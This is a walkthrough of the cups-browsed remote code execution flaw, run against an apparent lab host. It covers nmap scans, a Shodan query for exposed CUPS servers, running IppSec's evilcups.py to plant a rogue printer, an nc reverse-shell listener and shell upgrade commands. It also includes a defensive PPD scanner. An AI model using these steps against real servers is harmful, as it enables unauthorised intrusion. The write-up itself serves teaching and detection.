Attacking UNIX systems via CUPS

2024-10-01

Intro

CUPS is a modular printing system for Unix-like computer operating systems which allows a computer to act as a print server. This vulnerability was discovered by Evilsocket (Simone Margaritelli).

https://github.com/OpenPrinting/cups-browsed/security/advisories/GHSA-rj88-6mr5-rcw8

PoC: RCE

Let’s assume our target host is 10.10.11.40. We can conduct enumeration using Nmap with the following command:

sudo nmap -sC -sV -vv -oA nmap/evilcups 10.10.11.40

This command runs Nmap's default scripts (-sC) and service version detection (-sV) with increased verbosity (-vv). The -oA nmap/evilcups option saves the scan results in all three major output formats, using "nmap/evilcups" as the base file name.

...

The scan reveals a Debian machine with port 22 open, along with the Internet Printing Protocol (IPP) listening on port 631, indicating it is running CUPS 2.4. A web server is hosted on this interface, displaying the title "Home – CUPS 2.4.2." We can access it at http://10.10.11.40 in our browsers.

...

As we can see, the default CUPS management interface is exposed.

[!] Note that it is effortless to search for instances where this interface is exposed on the open web. This can be done by heading to Shodan and searching:

port:631 "CUPS"

Using an IP address from the results in Shodan, such as x.x.x.x:631, we can successfully bring up the CUPS management interface for these targets.

Let's pivot back to our PoC for now. Currently, we are accessing this instance as an “anonymous user.” While we lack administrative privileges, we can still view the printers.

...

Actions that we can conduct from here include viewing the jobs associated with this printer and printing a test page. Note that we cannot delete or modify printers at this time, as we are not an administrator.

The next step is to run the command:

sudo nmap -sU -p 631,632 10.10.11.40

This command instructs Nmap to perform a UDP scan (-sU) on the target host, checking only ports 631 and 632. Here is the result:

...

Note that Evilsocket has detailed the main CVEs associated with this vulnerability here.

...

Also, we can view the reported vulnerability on GitHub.

...

Another version of this code has been made available to us by IppSec:

https://github.com/ippsec/evil-cups

IppSec has made a few improvements to this PoC, and as such, I will be talking about this script. It can be run with:

python evilcups.py [my host IP] [target host IP]

Let’s dig into that script a bit:

...

This function is responsible for sending our UDP packet to our target host. In this script we are sending our specified attributes.

An interesting part of this script is:

...

This line begins with a single quote. This results in a blank variable being inserted during our request. To get a better understanding of our packet, we can visit Apple.com.

...

After “evilcups.py” is executed, when we refresh the CUPS interface from earlier (http://10.10.11.40), we can see that we have added a new printer under the name we specified ("HACKED"):

...

A listener for the reverse shell can be started with: nc -lvnp 9001. Here we use netcat to listen on port 9001. Next, click into this newly added printer and print a test page. Doing so triggers the “FoomaticRIPCommandLine” section of IppSec's code, consequently spawning a shell.

...

Upgrading the shell is done with:

python -c 'import pty;pty.spawn("/bin/bash")'

Note that this command spawns a bash session attached to a pseudo-terminal, which helps where a fully interactive shell is not available, e.g. a remote access session like this one.

After that, we can execute the command:

stty raw -echo; fg

This command sets the terminal to 'raw' mode with local echo disabled and brings the background job to the foreground. At this point, a reverse shell as the "lp" user is established.


The "Fix"

We can head to the cups-browsed Git repo and see the change brought in as a result of this vulnerability.

https://github.com/OpenPrinting/cups-browsed/commit/1debe6b140c37e0aa928559add4abcc95ce54aa2
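
On the defensive side, the “FoomaticRIPCommandLine” abuse described above can be hunted for in the PPD files on a print host. The following is an added example, not code from this article, IppSec's script or OpenPrinting: it extracts each FoomaticRIPCommandLine value from PPD text and flags any that start a program outside an allowlist. The allowlist, the function names and both sample PPDs are assumptions constructed for illustration; /etc/cups/ppd is where CUPS keeps installed PPDs.

```python
import glob
import re

# Assumption: programs this site expects a FoomaticRIPCommandLine to start.
ALLOWED = {"gs", "cat", "pdftops"}
DIRECTIVE = re.compile(r'^\*FoomaticRIPCommandLine[^:\n]*:\s*"(.*?)"', re.S | re.M)
SEPARATORS = re.compile(r"\|\||&&|[;|&]")  # operators that start another command
SUBSTITUTION = re.compile(r"`|\$\(")       # backticks or $( ... )

def command_lines(ppd_text):
    """Extract each FoomaticRIPCommandLine value as one normalised string."""
    # foomatic PPDs wrap long values with '&&' at end of line; undo that first.
    return [" ".join(v.replace("&&\n", "").split())
            for v in DIRECTIVE.findall(ppd_text)]

def findings(ppd_text):
    """Return (command, reasons) for every command line that looks unsafe."""
    results = []
    for cmd in command_lines(ppd_text):
        reasons = ["command substitution"] if SUBSTITUTION.search(cmd) else []
        for segment in SEPARATORS.split(cmd):
            words = segment.split()
            # Compare the basename so /usr/bin/gs and gs are treated alike.
            if words and words[0].rsplit("/", 1)[-1] not in ALLOWED:
                reasons.append("unexpected program: " + words[0])
        if reasons:
            results.append((cmd, reasons))
    return results

def scan_dir(pattern="/etc/cups/ppd/*.ppd"):
    """Map each installed PPD path to its findings; an empty dict means clean."""
    report = {}
    for path in glob.glob(pattern):
        with open(path, encoding="utf-8", errors="replace") as handle:
            hits = findings(handle.read())
        if hits:
            report[path] = hits
    return report

# Constructed samples, not taken from a real printer or from the PoC.
SAMPLE_OK = '''*PPD-Adobe: "4.3"
*FoomaticRIPCommandLine: "gs -q -dBATCH -dNOPAUSE -sDEVICE=lj&&
et4 -sOutputFile=- -"
*End
'''
SAMPLE_BAD = '''*PPD-Adobe: "4.3"
*FoomaticRIPCommandLine: "echo constructed-marker > /tmp/ppd-audit-demo"
'''

if __name__ == "__main__":
    print(findings(SAMPLE_OK), findings(SAMPLE_BAD))
```

Calling scan_dir() on a print host, with enough privilege to read the PPD directory, applies the same check to every installed printer. Any hit on a printer nobody added by hand is worth investigating.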

Closing

Something I found interesting was how turbulent the reporting process was for Evilsocket. They go into more detail about it in their blog but essentially, this issue was quite difficult to report despite being so dangerous. Furthermore, he explains that his initial report of this finding was leaked!

Thank You

I want to thank you for reading this article, IppSec for the wonderful documentation, and Evilsocket (Simone Margaritelli) for sharing their findings surrounding this vulnerability!

https://www.evilsocket.net/
https://www.linkedin.com/in/ippsec/